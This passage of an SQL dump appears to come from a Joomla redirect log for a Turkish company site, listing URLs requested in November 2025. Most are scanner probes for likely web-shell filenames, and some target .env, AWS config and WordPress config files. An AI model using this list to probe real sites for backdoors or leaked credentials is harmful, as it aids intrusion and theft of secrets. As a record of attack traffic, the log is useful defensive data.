00:00:00',301),(49141,'http://mail.3s-technologies.com.tr/tr/iko.php',NULL,'','',8,0,'2025-11-10 10:01:20','0000-00-00 00:00:00',301),(49142,'http://mail.3s-technologies.com.tr/tr/moie.php',NULL,'','',2,0,'2025-11-10 10:01:22','0000-00-00 00:00:00',301),(49143,'http://mail.3s-technologies.com.tr/tr/sko.php',NULL,'','',12,0,'2025-11-10 10:01:24','0000-00-00 00:00:00',301),(49144,'http://mail.3s-technologies.com.tr/tr/wp-gif.php',NULL,'','',2,0,'2025-11-10 10:01:25','0000-00-00 00:00:00',301),(49145,'http://mail.3s-technologies.com.tr/tr/rxzx.php',NULL,'','',2,0,'2025-11-10 10:01:28','0000-00-00 00:00:00',301),(49146,'http://mail.3s-technologies.com.tr/tr/tj.php',NULL,'','',2,0,'2025-11-10 10:01:28','0000-00-00 00:00:00',301),(49147,'http://mail.3s-technologies.com.tr/tr/vansec.php',NULL,'','',2,0,'2025-11-10 10:01:29','0000-00-00 00:00:00',301),(49148,'http://mail.3s-technologies.com.tr/tr/scx.php7',NULL,'','',5,0,'2025-11-10 10:01:32','0000-00-00 00:00:00',301),(49149,'http://mail.3s-technologies.com.tr/tr/csv.php',NULL,'','',6,0,'2025-11-10 10:01:35','0000-00-00 00:00:00',301),(49150,'http://mail.3s-technologies.com.tr/tr/abc.php',NULL,'','',39,0,'2025-11-10 10:01:36','0000-00-00 00:00:00',301),(49151,'http://mail.3s-technologies.com.tr/tr/wpc1.php',NULL,'','',2,0,'2025-11-10 10:01:37','0000-00-00 00:00:00',301),(49152,'http://mail.3s-technologies.com.tr/tr/raw.php',NULL,'','',18,0,'2025-11-10 10:01:38','0000-00-00 00:00:00',301),(49153,'http://mail.3s-technologies.com.tr/tr/p.php',NULL,'','',42,0,'2025-11-10 10:01:39','0000-00-00 00:00:00',301),(49154,'http://mail.3s-technologies.com.tr/tr/xpas22.php',NULL,'','',2,0,'2025-11-10 10:01:40','0000-00-00 00:00:00',301),(49155,'http://mail.3s-technologies.com.tr/tr/wp1.php',NULL,'','',15,0,'2025-11-10 10:01:41','0000-00-00 00:00:00',301),(49156,'http://mail.3s-technologies.com.tr/tr/tmpls.php',NULL,'','',12,0,'2025-11-10 10:01:45','0000-00-00 00:00:00',301),(49157,'http://mail.3s-technologies.com.tr/tr/smpx.php',NULL,'','',3,0,'2025-11-10 10:01:47','0000-00-00 00:00:00',301),(49158,'http://mail.3s-technologies.com.tr/tr/wp-asd.php',NULL,'','',2,0,'2025-11-10 10:01:47','0000-00-00 00:00:00',301),(49159,'http://mail.3s-technologies.com.tr/tr/class5.php',NULL,'','',2,0,'2025-11-10 10:01:48','0000-00-00 00:00:00',301),(49160,'http://mail.3s-technologies.com.tr/tr/g7y.php',NULL,'','',2,0,'2025-11-10 10:01:49','0000-00-00 00:00:00',301),(49161,'http://mail.3s-technologies.com.tr/tr/ok.php',NULL,'','',42,0,'2025-11-10 10:01:50','0000-00-00 00:00:00',301),(49162,'http://mail.3s-technologies.com.tr/tr/oswkk.php',NULL,'','',2,0,'2025-11-10 10:01:53','0000-00-00 00:00:00',301),(49163,'http://mail.3s-technologies.com.tr/tr/rex.php',NULL,'','',2,0,'2025-11-10 10:01:54','0000-00-00 00:00:00',301),(49164,'http://mail.3s-technologies.com.tr/tr/api137.php',NULL,'','',2,0,'2025-11-10 10:01:58','0000-00-00 00:00:00',301),(49165,'http://mail.3s-technologies.com.tr/tr/class629.php',NULL,'','',4,0,'2025-11-10 10:01:58','0000-00-00 00:00:00',301),(49166,'http://mail.3s-technologies.com.tr/tr/wp-x7.php',NULL,'','',9,0,'2025-11-10 10:01:59','0000-00-00 00:00:00',301),(49167,'http://mail.3s-technologies.com.tr/tr/wp670.php',NULL,'','',2,0,'2025-11-10 10:02:00','0000-00-00 00:00:00',301),(49168,'http://mail.3s-technologies.com.tr/tr/x7.php',NULL,'','',17,0,'2025-11-10 10:02:02','0000-00-00 00:00:00',301),(49169,'http://mail.3s-technologies.com.tr/tr/zex.php',NULL,'','',2,0,'2025-11-10 10:02:04','0000-00-00 00:00:00',301),(49170,'http://mail.3s-technologies.com.tr/tr/zxin.php',NULL,'','',14,0,'2025-11-10 10:02:05','0000-00-00 00:00:00',301),(49171,'http://mail.3s-technologies.com.tr/tr/enkkk.php',NULL,'','',2,0,'2025-11-10 10:02:08','0000-00-00 00:00:00',301),(49172,'http://mail.3s-technologies.com.tr/tr/hello.php',NULL,'','',16,0,'2025-11-10 10:02:12','0000-00-00 00:00:00',301),(49173,'http://mail.3s-technologies.com.tr/tr/lock1.php',NULL,'','',5,0,'2025-11-10 10:02:14','0000-00-00 00:00:00',301),(49174,'http://mail.3s-technologies.com.tr/tr/bes.php',NULL,'','',5,0,'2025-11-10 10:02:17','0000-00-00 00:00:00',301),(49175,'http://mail.3s-technologies.com.tr/tr/wp-swa.php',NULL,'','',2,0,'2025-11-10 10:02:18','0000-00-00 00:00:00',301),(49176,'http://3s-technologies.com.tr/tr/wsz.php',NULL,'','',3,0,'2025-11-10 11:26:28','0000-00-00 00:00:00',301),(49177,'http://3s-technologies.com.tr/tr/ahy66.php',NULL,'','',2,0,'2025-11-10 11:26:29','0000-00-00 00:00:00',301),(49178,'http://3s-technologies.com.tr/tr/ze.php',NULL,'','',22,0,'2025-11-10 13:37:15','0000-00-00 00:00:00',301),(49179,'http://3s-technologies.com.tr/tr/dd1.php',NULL,'','',2,0,'2025-11-10 13:37:20','0000-00-00 00:00:00',301),(49180,'http://3s-technologies.com.tr/tr/kki.php',NULL,'','',2,0,'2025-11-10 13:37:25','0000-00-00 00:00:00',301),(49181,'http://3s-technologies.com.tr/tr/sid3.php',NULL,'','',74,0,'2025-11-10 13:37:29','0000-00-00 00:00:00',301),(49182,'http://3s-technologies.com.tr/tr/mans.php',NULL,'','',22,0,'2025-11-10 13:37:30','0000-00-00 00:00:00',301),(49183,'http://3s-technologies.com.tr/tr/fs6.php',NULL,'','',13,0,'2025-11-10 13:37:35','0000-00-00 00:00:00',301),(49184,'http://3s-technologies.com.tr/tr/bi1f.php',NULL,'','',2,0,'2025-11-10 13:37:39','0000-00-00 00:00:00',301),(49185,'http://3s-technologies.com.tr/tr/luxe.php',NULL,'','',15,0,'2025-11-10 13:37:41','0000-00-00 00:00:00',301),(49186,'http://3s-technologies.com.tr/tr/an7.php',NULL,'','',30,0,'2025-11-10 13:37:44','0000-00-00 00:00:00',301),(49187,'http://3s-technologies.com.tr/tr/fs7.php',NULL,'','',9,0,'2025-11-10 13:37:44','0000-00-00 00:00:00',301),(49188,'http://3s-technologies.com.tr/tr/iko.php',NULL,'','',11,0,'2025-11-10 13:37:49','0000-00-00 00:00:00',301),(49189,'http://3s-technologies.com.tr/tr/moie.php',NULL,'','',3,0,'2025-11-10 13:37:51','0000-00-00 00:00:00',301),(49190,'http://3s-technologies.com.tr/tr/shelp.php',NULL,'','',20,0,'2025-11-10 13:37:52','0000-00-00 00:00:00',301),(49191,'http://3s-technologies.com.tr/tr/sko.php',NULL,'','',12,0,'2025-11-10 13:37:54','0000-00-00 00:00:00',301),(49192,'http://3s-technologies.com.tr/tr/wp-gif.php',NULL,'','',2,0,'2025-11-10 13:37:56','0000-00-00 00:00:00',301),(49193,'http://3s-technologies.com.tr/tr/rxzx.php',NULL,'','',3,0,'2025-11-10 13:37:59','0000-00-00 00:00:00',301),(49194,'http://3s-technologies.com.tr/tr/tj.php',NULL,'','',3,0,'2025-11-10 13:38:00','0000-00-00 00:00:00',301),(49195,'http://3s-technologies.com.tr/tr/vansec.php',NULL,'','',2,0,'2025-11-10 13:38:01','0000-00-00 00:00:00',301),(49196,'http://3s-technologies.com.tr/tr/wp-is.php',NULL,'','',20,0,'2025-11-10 13:38:04','0000-00-00 00:00:00',301),(49197,'http://3s-technologies.com.tr/tr/scx.php7',NULL,'','',6,0,'2025-11-10 13:38:06','0000-00-00 00:00:00',301),(49198,'http://3s-technologies.com.tr/tr/wpc1.php',NULL,'','',2,0,'2025-11-10 13:38:13','0000-00-00 00:00:00',301),(49199,'http://3s-technologies.com.tr/tr/xpas22.php',NULL,'','',2,0,'2025-11-10 13:38:17','0000-00-00 00:00:00',301),(49200,'http://3s-technologies.com.tr/tr/smpx.php',NULL,'','',3,0,'2025-11-10 13:38:26','0000-00-00 00:00:00',301),(49201,'http://3s-technologies.com.tr/tr/wp-asd.php',NULL,'','',2,0,'2025-11-10 13:38:27','0000-00-00 00:00:00',301),(49202,'http://3s-technologies.com.tr/tr/class5.php',NULL,'','',2,0,'2025-11-10 13:38:28','0000-00-00 00:00:00',301),(49203,'http://3s-technologies.com.tr/tr/yas.php',NULL,'','',35,0,'2025-11-10 13:38:29','0000-00-00 00:00:00',301),(49204,'http://3s-technologies.com.tr/tr/g7y.php',NULL,'','',4,0,'2025-11-10 13:38:31','0000-00-00 00:00:00',301),(49205,'http://3s-technologies.com.tr/tr/oswkk.php',NULL,'','',2,0,'2025-11-10 13:38:35','0000-00-00 00:00:00',301),(49206,'http://3s-technologies.com.tr/tr/api137.php',NULL,'','',2,0,'2025-11-10 13:38:42','0000-00-00 00:00:00',301),(49207,'http://3s-technologies.com.tr/tr/class629.php',NULL,'','',4,0,'2025-11-10 13:38:43','0000-00-00 00:00:00',301),(49208,'http://3s-technologies.com.tr/tr/wp-x7.php',NULL,'','',9,0,'2025-11-10 13:38:44','0000-00-00 00:00:00',301),(49209,'http://3s-technologies.com.tr/tr/wp670.php',NULL,'','',2,0,'2025-11-10 13:38:45','0000-00-00 00:00:00',301),(49210,'http://3s-technologies.com.tr/tr/zxin.php',NULL,'','',16,0,'2025-11-10 13:38:50','0000-00-00 00:00:00',301),(49211,'http://3s-technologies.com.tr/tr/enkkk.php',NULL,'','',2,0,'2025-11-10 13:38:53','0000-00-00 00:00:00',301),(49212,'http://3s-technologies.com.tr/tr/wp-swa.php',NULL,'','',2,0,'2025-11-10 13:39:07','0000-00-00 00:00:00',301),(49213,'http://3s-technologies.com.tr/joomla/index.php?lang=en&limitstart=5',NULL,'','',4,0,'2025-11-10 20:01:25','0000-00-00 00:00:00',301),(49214,'https://3s-technologies.com.tr/joomla/index.php?lang=en&limitstart=5',NULL,'','',3,0,'2025-11-10 20:01:55','0000-00-00 00:00:00',301),(49215,'http://3s-technologies.com.tr/tr/administrator/components/com_filecabinet/filecabinet.xml',NULL,'','',1,0,'2025-11-11 13:23:46','0000-00-00 00:00:00',301),(49216,'http://3s-technologies.com.tr/tr/include/ckeditor/images/addon.gif',NULL,'http://3s-technologies.com.tr','',3,0,'2025-11-11 16:47:25','0000-00-00 00:00:00',301),(49217,'https://3s-technologies.com.tr/tr/env/.env',NULL,'https://3s-technologies.com.tr/env/.env','',2,0,'2025-11-11 18:09:43','0000-00-00 00:00:00',301),(49218,'http://3s-technologies.com.tr/tr/e/data/images/arrow.gif',NULL,'http://3s-technologies.com.tr','',2,0,'2025-11-11 18:41:37','0000-00-00 00:00:00',301),(49219,'http://3s-technologies.com.tr/tr/images/loadinglit.gif',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-11 22:46:12','0000-00-00 00:00:00',301),(49220,'http://3s-technologies.com.tr/tr/public/static/common/images/file.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-11 22:47:34','0000-00-00 00:00:00',301),(49221,'http://3s-technologies.com.tr/tr/public/static/admin/images/ok.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-11 22:47:35','0000-00-00 00:00:00',301),(49222,'http://3s-technologies.com.tr/tr/e/data/ecmseditor/infoeditor/plugins/smiley/images/angel_smile.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-11 23:54:44','0000-00-00 00:00:00',301),(49223,'http://3s-technologies.com.tr/tr/e/data/js/jscolor/hs.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-11 23:54:45','0000-00-00 00:00:00',301),(49224,'http://3s-technologies.com.tr/tr/zb_system/image/common/user_1.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-12 00:21:50','0000-00-00 00:00:00',301),(49225,'http://3s-technologies.com.tr/tr/zb_users/avatar/0.png',NULL,'http://3s-technologies.com.tr','',1,0,'2025-11-12 00:21:51','0000-00-00 00:00:00',301),(49226,'http://mail.3s-technologies.com.tr/tr/lites.php',NULL,'','',4,0,'2025-11-12 12:35:47','0000-00-00 00:00:00',301),(49227,'http://mail.3s-technologies.com.tr/tr/gorila.php',NULL,'','',1,0,'2025-11-12 12:35:55','0000-00-00 00:00:00',301),(49228,'http://mail.3s-technologies.com.tr/tr/sao.php',NULL,'','',2,0,'2025-11-12 12:36:09','0000-00-00 00:00:00',301),(49229,'http://3s-technologies.com.tr/en/yznzgycu.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-11-12 13:06:52','0000-00-00 00:00:00',301),(49230,'https://3s-technologies.com.tr/en/ffvhfmfc.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-11-12 13:06:54','0000-00-00 00:00:00',301),(49231,'http://3s-technologies.com.tr/tr/oxshell.php',NULL,'','',1,0,'2025-11-12 19:34:11','0000-00-00 00:00:00',301),(49232,'http://3s-technologies.com.tr/tr/vxonb.php',NULL,'','',1,0,'2025-11-12 19:53:30','0000-00-00 00:00:00',301),(49233,'http://3s-technologies.com.tr/tr/wozxsh.php',NULL,'','',1,0,'2025-11-12 19:53:31','0000-00-00 00:00:00',301),(49234,'http://3s-technologies.com.tr/tr/whf.php',NULL,'','',1,0,'2025-11-12 19:53:32','0000-00-00 00:00:00',301),(49235,'http://3s-technologies.com.tr/tr/bkxzo.php',NULL,'','',10,0,'2025-11-12 19:53:33','0000-00-00 00:00:00',301),(49236,'http://3s-technologies.com.tr/tr/error1.php',NULL,'','',4,0,'2025-11-12 19:53:35','0000-00-00 00:00:00',301),(49237,'http://3s-technologies.com.tr/tr/xtt.php',NULL,'','',11,0,'2025-11-12 19:53:36','0000-00-00 00:00:00',301),(49238,'http://3s-technologies.com.tr/tr/wcas.php',NULL,'','',5,0,'2025-11-12 19:53:38','0000-00-00 00:00:00',301),(49239,'http://3s-technologies.com.tr/tr/awh77.php',NULL,'','',1,0,'2025-11-12 19:53:42','0000-00-00 00:00:00',301),(49240,'http://3s-technologies.com.tr/tr/nax.php',NULL,'','',2,0,'2025-11-12 19:53:43','0000-00-00 00:00:00',301),(49241,'http://3s-technologies.com.tr/tr/wolv2.php',NULL,'','',11,0,'2025-11-12 19:53:44','0000-00-00 00:00:00',301),(49242,'http://3s-technologies.com.tr/tr/mtvcrew.php',NULL,'','',2,0,'2025-11-12 19:53:45','0000-00-00 00:00:00',301),(49243,'http://3s-technologies.com.tr/tr/twso.php',NULL,'','',1,0,'2025-11-12 19:53:46','0000-00-00 00:00:00',301),(49244,'http://3s-technologies.com.tr/tr/144.php',NULL,'','',21,0,'2025-11-12 19:53:47','0000-00-00 00:00:00',301),(49245,'http://3s-technologies.com.tr/tr/exhitrgp.php',NULL,'','',1,0,'2025-11-12 19:53:48','0000-00-00 00:00:00',301),(49246,'http://3s-technologies.com.tr/tr/n3.php',NULL,'','',15,0,'2025-11-12 19:53:49','0000-00-00 00:00:00',301),(49247,'http://mail.3s-technologies.com.tr/tr/postnews.php',NULL,'','',1,0,'2025-11-12 20:30:52','0000-00-00 00:00:00',301),(49248,'http://mail.3s-technologies.com.tr/tr/wp-blog-header.php',NULL,'','',18,0,'2025-11-12 20:30:54','0000-00-00 00:00:00',301),(49249,'http://mail.3s-technologies.com.tr/tr/wp-signup.php',NULL,'','',6,0,'2025-11-12 20:30:55','0000-00-00 00:00:00',301),(49250,'http://mail.3s-technologies.com.tr/tr/xmlrpc,php',NULL,'','',1,0,'2025-11-12 20:30:57','0000-00-00 00:00:00',301),(49251,'http://mail.3s-technologies.com.tr/tr/wp-settin.zip.php',NULL,'','',1,0,'2025-11-12 20:31:00','0000-00-00 00:00:00',301),(49252,'http://mail.3s-technologies.com.tr/tr/wp-links-opml.php',NULL,'','',18,0,'2025-11-12 20:31:02','0000-00-00 00:00:00',301),(49253,'http://mail.3s-technologies.com.tr/tr/style.php',NULL,'','',25,0,'2025-11-12 20:31:03','0000-00-00 00:00:00',301),(49254,'http://mail.3s-technologies.com.tr/tr/wp-setting.php',NULL,'','',7,0,'2025-11-12 20:31:04','0000-00-00 00:00:00',301),(49255,'http://mail.3s-technologies.com.tr/tr/classgoto24(3).php',NULL,'','',1,0,'2025-11-12 20:31:04','0000-00-00 00:00:00',301),(49256,'http://mail.3s-technologies.com.tr/tr/wp-comments-post.php',NULL,'','',2,0,'2025-11-12 20:31:06','0000-00-00 00:00:00',301),(49257,'http://mail.3s-technologies.com.tr/tr/wp-config-sample.php',NULL,'','',12,0,'2025-11-12 20:31:07','0000-00-00 00:00:00',301),(49258,'http://mail.3s-technologies.com.tr/tr/scn.php',NULL,'','',1,0,'2025-11-12 20:31:08','0000-00-00 00:00:00',301),(49259,'http://mail.3s-technologies.com.tr/tr/vdconnect-8t3r5cwj.php',NULL,'','',1,0,'2025-11-12 20:31:09','0000-00-00 00:00:00',301),(49260,'http://3s-technologies.com.tr/graphql',NULL,'','',3,0,'2025-11-12 21:45:45','0000-00-00 00:00:00',301),(49261,'https://3s-technologies.com.tr/api',NULL,'','',4,0,'2025-11-12 21:45:47','0000-00-00 00:00:00',301),(49262,'http://3s-technologies.com.tr/api',NULL,'','',3,0,'2025-11-12 21:45:47','0000-00-00 00:00:00',301),(49263,'http://3s-technologies.com.tr/api/graphql',NULL,'','',3,0,'2025-11-12 21:45:48','0000-00-00 00:00:00',301),(49264,'https://3s-technologies.com.tr/graphql/api',NULL,'','',3,0,'2025-11-12 21:45:48','0000-00-00 00:00:00',301),(49265,'http://3s-technologies.com.tr/graphql/api',NULL,'','',3,0,'2025-11-12 21:45:48','0000-00-00 00:00:00',301),(49266,'https://3s-technologies.com.tr/api/gql',NULL,'','',3,0,'2025-11-12 21:45:49','0000-00-00 00:00:00',301),(49267,'http://3s-technologies.com.tr/api/gql',NULL,'','',3,0,'2025-11-12 21:45:49','0000-00-00 00:00:00',301),(49268,'http://3s-technologies.com.tr/tr/gorila.php',NULL,'','',5,0,'2025-11-12 22:01:52','0000-00-00 00:00:00',301),(49269,'https://3s-technologies.com.tr/tr/\"/templates/beez5/javascript/hide.js\"',NULL,'','',15,0,'2025-11-13 04:03:05','0000-00-00 00:00:00',301),(49270,'https://3s-technologies.com.tr/tr/\"/media/djextensions/jquery-easing/jquery.easing.min.js\"',NULL,'','',14,0,'2025-11-13 04:03:05','0000-00-00 00:00:00',301),(49271,'https://3s-technologies.com.tr/tr/\"/templates/beez5/javascript/md_stylechanger.js\"',NULL,'','',13,0,'2025-11-13 04:03:06','0000-00-00 00:00:00',301),(49272,'https://3s-technologies.com.tr/tr/\"/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',14,0,'2025-11-13 04:04:09','0000-00-00 00:00:00',301),(49273,'https://3s-technologies.com.tr/tr/\"/media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',14,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49274,'https://3s-technologies.com.tr/tr/\"/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',15,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49275,'https://3s-technologies.com.tr/tr/\"/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',14,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49276,'https://3s-technologies.com.tr/tr/\"/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',14,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49277,'https://3s-technologies.com.tr/tr/\"/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',15,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49278,'https://3s-technologies.com.tr/tr/\"/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd\"',NULL,'','',14,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49279,'https://3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd\"',NULL,'','',12,0,'2025-11-13 04:04:10','0000-00-00 00:00:00',301),(49280,'https://3s-technologies.com.tr/tr/aws-config.js',NULL,'','',16,0,'2025-11-13 04:04:28','0000-00-00 00:00:00',301),(49281,'https://3s-technologies.com.tr/tr/aws.config.js',NULL,'','',16,0,'2025-11-13 04:04:29','0000-00-00 00:00:00',301),(49282,'https://3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd\"',NULL,'','',15,0,'2025-11-13 04:04:32','0000-00-00 00:00:00',301),(49283,'https://3s-technologies.com.tr/tr/\"/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',15,0,'2025-11-13 04:04:32','0000-00-00 00:00:00',301),(49284,'https://3s-technologies.com.tr/tr/\"/media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'','',13,0,'2025-11-13 04:04:32','0000-00-00 00:00:00',301),(49285,'https://3s-technologies.com.tr/tr/\"/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1\"',NULL,'','',13,0,'2025-11-13 04:04:32','0000-00-00 00:00:00',301),(49286,'http://3s-technologies.com.tr/tr/aku.php',NULL,'http://3s-technologies.com.tr/aku.php','',2,0,'2025-11-13 08:00:11','0000-00-00 00:00:00',301),(49287,'http://3s-technologies.com.tr/tr/cord.php',NULL,'http://3s-technologies.com.tr/cord.php','',26,0,'2025-11-13 08:00:12','0000-00-00 00:00:00',301),(49288,'http://3s-technologies.com.tr/tr/wp-admin/zwso.php',NULL,'http://3s-technologies.com.tr/wp-admin/zwso.php','',16,0,'2025-11-13 08:00:17','0000-00-00 00:00:00',301),(49289,'http://3s-technologies.com.tr/tr/wpssl.php',NULL,'http://3s-technologies.com.tr/wpssl.php','',2,0,'2025-11-13 08:00:22','0000-00-00 00:00:00',301),(49290,'http://3s-technologies.com.tr/tr/bless.php/mail.php',NULL,'','',1,0,'2025-11-13 13:27:01','0000-00-00 00:00:00',301),(49291,'http://mail.3s-technologies.com.tr/tr/vxonb.php',NULL,'','',1,0,'2025-11-14 16:19:44','0000-00-00 00:00:00',301),(49292,'http://mail.3s-technologies.com.tr/tr/wozxsh.php',NULL,'','',1,0,'2025-11-14 16:19:45','0000-00-00 00:00:00',301),(49293,'http://mail.3s-technologies.com.tr/tr/whf.php',NULL,'','',1,0,'2025-11-14 16:19:46','0000-00-00 00:00:00',301),(49294,'http://mail.3s-technologies.com.tr/tr/bkxzo.php',NULL,'','',6,0,'2025-11-14 16:19:47','0000-00-00 00:00:00',301),(49295,'http://mail.3s-technologies.com.tr/tr/error1.php',NULL,'','',4,0,'2025-11-14 16:19:48','0000-00-00 00:00:00',301),(49296,'http://mail.3s-technologies.com.tr/tr/xtt.php',NULL,'','',10,0,'2025-11-14 16:19:49','0000-00-00 00:00:00',301),(49297,'http://mail.3s-technologies.com.tr/tr/wcas.php',NULL,'','',8,0,'2025-11-14 16:19:51','0000-00-00 00:00:00',301),(49298,'http://mail.3s-technologies.com.tr/tr/class-db.php',NULL,'','',3,0,'2025-11-14 16:19:52','0000-00-00 00:00:00',301),(49299,'http://mail.3s-technologies.com.tr/tr/xxx.php',NULL,'','',28,0,'2025-11-14 16:19:53','0000-00-00 00:00:00',301),(49300,'http://mail.3s-technologies.com.tr/tr/awh77.php',NULL,'','',1,0,'2025-11-14 16:19:55','0000-00-00 00:00:00',301),(49301,'http://mail.3s-technologies.com.tr/tr/nax.php',NULL,'','',2,0,'2025-11-14 16:19:56','0000-00-00 00:00:00',301),(49302,'http://mail.3s-technologies.com.tr/tr/wolv2.php',NULL,'','',10,0,'2025-11-14 16:19:57','0000-00-00 00:00:00',301),(49303,'http://mail.3s-technologies.com.tr/tr/mtvcrew.php',NULL,'','',1,0,'2025-11-14 16:19:58','0000-00-00 00:00:00',301),(49304,'http://mail.3s-technologies.com.tr/tr/twso.php',NULL,'','',1,0,'2025-11-14 16:19:59','0000-00-00 00:00:00',301),(49305,'http://mail.3s-technologies.com.tr/tr/144.php',NULL,'','',11,0,'2025-11-14 16:20:00','0000-00-00 00:00:00',301),(49306,'http://mail.3s-technologies.com.tr/tr/exhitrgp.php',NULL,'','',1,0,'2025-11-14 16:20:01','0000-00-00 00:00:00',301),(49307,'http://mail.3s-technologies.com.tr/tr/n3.php',NULL,'','',11,0,'2025-11-14 16:20:02','0000-00-00 00:00:00',301),(49308,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/slideshow/0-cm602_cm101.jpg',NULL,'','',2,0,'2025-11-14 17:51:45','0000-00-00 00:00:00',301),(49309,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/slideshow/94-kd_f350sc.jpg',NULL,'','',2,0,'2025-11-14 17:51:46','0000-00-00 00:00:00',301),(49310,'http://3s-technologies.com.tr/tr/unity.php',NULL,'','',2,0,'2025-11-14 17:53:41','0000-00-00 00:00:00',301),(49311,'http://3s-technologies.com.tr/tr/rdfe.php',NULL,'','',2,0,'2025-11-14 17:53:50','0000-00-00 00:00:00',301),(49312,'http://3s-technologies.com.tr/tr/fb.php',NULL,'','',1,0,'2025-11-14 17:54:08','0000-00-00 00:00:00',301),(49313,'http://3s-technologies.com.tr/tr/bqcheck.php',NULL,'','',2,0,'2025-11-14 17:54:12','0000-00-00 00:00:00',301),(49314,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/wpxadmin.php',NULL,'','',1,0,'2025-11-14 17:54:19','0000-00-00 00:00:00',301),(49315,'http://3s-technologies.com.tr/tr/bin.php',NULL,'','',2,0,'2025-11-14 17:54:40','0000-00-00 00:00:00',301),(49316,'http://3s-technologies.com.tr/tr/winkel.php',NULL,'','',1,0,'2025-11-14 17:54:42','0000-00-00 00:00:00',301),(49317,'http://3s-technologies.com.tr/tr/ef.php',NULL,'','',2,0,'2025-11-14 17:54:43','0000-00-00 00:00:00',301),(49318,'http://3s-technologies.com.tr/tr/wp-su.php',NULL,'','',8,0,'2025-11-14 17:54:45','0000-00-00 00:00:00',301),(49319,'http://3s-technologies.com.tr/tr/oiepfuav.php',NULL,'','',2,0,'2025-11-14 17:54:48','0000-00-00 00:00:00',301),(49320,'http://3s-technologies.com.tr/tr/btufulhs.php',NULL,'','',1,0,'2025-11-14 17:54:51','0000-00-00 00:00:00',301),(49321,'http://3s-technologies.com.tr/tr/yzkvrell.php',NULL,'','',2,0,'2025-11-14 17:54:54','0000-00-00 00:00:00',301),(49322,'http://3s-technologies.com.tr/tr/nqsa.php',NULL,'','',2,0,'2025-11-14 17:54:56','0000-00-00 00:00:00',301),(49323,'http://3s-technologies.com.tr/tr/kill-9-1.php',NULL,'','',2,0,'2025-11-14 17:55:10','0000-00-00 00:00:00',301),(49324,'http://www.3s-technologies.com.tr/tr/ze.php',NULL,'','',7,0,'2025-11-14 18:08:43','0000-00-00 00:00:00',301),(49325,'http://www.3s-technologies.com.tr/tr/xo.php',NULL,'','',1,0,'2025-11-14 18:08:44','0000-00-00 00:00:00',301),(49326,'http://www.3s-technologies.com.tr/tr/wp-the1me.php',NULL,'','',3,0,'2025-11-14 18:08:46','0000-00-00 00:00:00',301),(49327,'http://www.3s-technologies.com.tr/tr/dd1.php',NULL,'','',1,0,'2025-11-14 18:08:48','0000-00-00 00:00:00',301),(49328,'http://www.3s-technologies.com.tr/tr/conn.php',NULL,'','',1,0,'2025-11-14 18:08:49','0000-00-00 00:00:00',301),(49329,'http://www.3s-technologies.com.tr/tr/card.php',NULL,'','',4,0,'2025-11-14 18:08:50','0000-00-00 00:00:00',301),(49330,'http://www.3s-technologies.com.tr/tr/kki.php',NULL,'','',1,0,'2025-11-14 18:08:52','0000-00-00 00:00:00',301),(49331,'http://www.3s-technologies.com.tr/tr/js.php',NULL,'','',4,0,'2025-11-14 18:08:53','0000-00-00 00:00:00',301),(49332,'http://www.3s-technologies.com.tr/tr/view.php',NULL,'','',1,0,'2025-11-14 18:08:54','0000-00-00 00:00:00',301),(49333,'http://www.3s-technologies.com.tr/tr/sid3.php',NULL,'','',14,0,'2025-11-14 18:08:56','0000-00-00 00:00:00',301),(49334,'http://www.3s-technologies.com.tr/tr/mans.php',NULL,'','',6,0,'2025-11-14 18:08:57','0000-00-00 00:00:00',301),(49335,'http://www.3s-technologies.com.tr/tr/fs6.php',NULL,'','',2,0,'2025-11-14 18:09:02','0000-00-00 00:00:00',301),(49336,'http://www.3s-technologies.com.tr/tr/habhan.php',NULL,'','',1,0,'2025-11-14 18:09:03','0000-00-00 00:00:00',301),(49337,'http://www.3s-technologies.com.tr/tr/bi1f.php',NULL,'','',1,0,'2025-11-14 18:09:05','0000-00-00 00:00:00',301),(49338,'http://www.3s-technologies.com.tr/tr/lib.php',NULL,'','',15,0,'2025-11-14 18:09:06','0000-00-00 00:00:00',301),(49339,'http://www.3s-technologies.com.tr/tr/luxe.php',NULL,'','',4,0,'2025-11-14 18:09:07','0000-00-00 00:00:00',301),(49340,'http://www.3s-technologies.com.tr/tr/an7.php',NULL,'','',6,0,'2025-11-14 18:09:10','0000-00-00 00:00:00',301),(49341,'http://www.3s-technologies.com.tr/tr/fs7.php',NULL,'','',1,0,'2025-11-14 18:09:11','0000-00-00 00:00:00',301),(49342,'http://www.3s-technologies.com.tr/tr/new4.php',NULL,'','',15,0,'2025-11-14 18:09:12','0000-00-00 00:00:00',301),(49343,'http://www.3s-technologies.com.tr/tr/icon.php',NULL,'','',1,0,'2025-11-14 18:09:13','0000-00-00 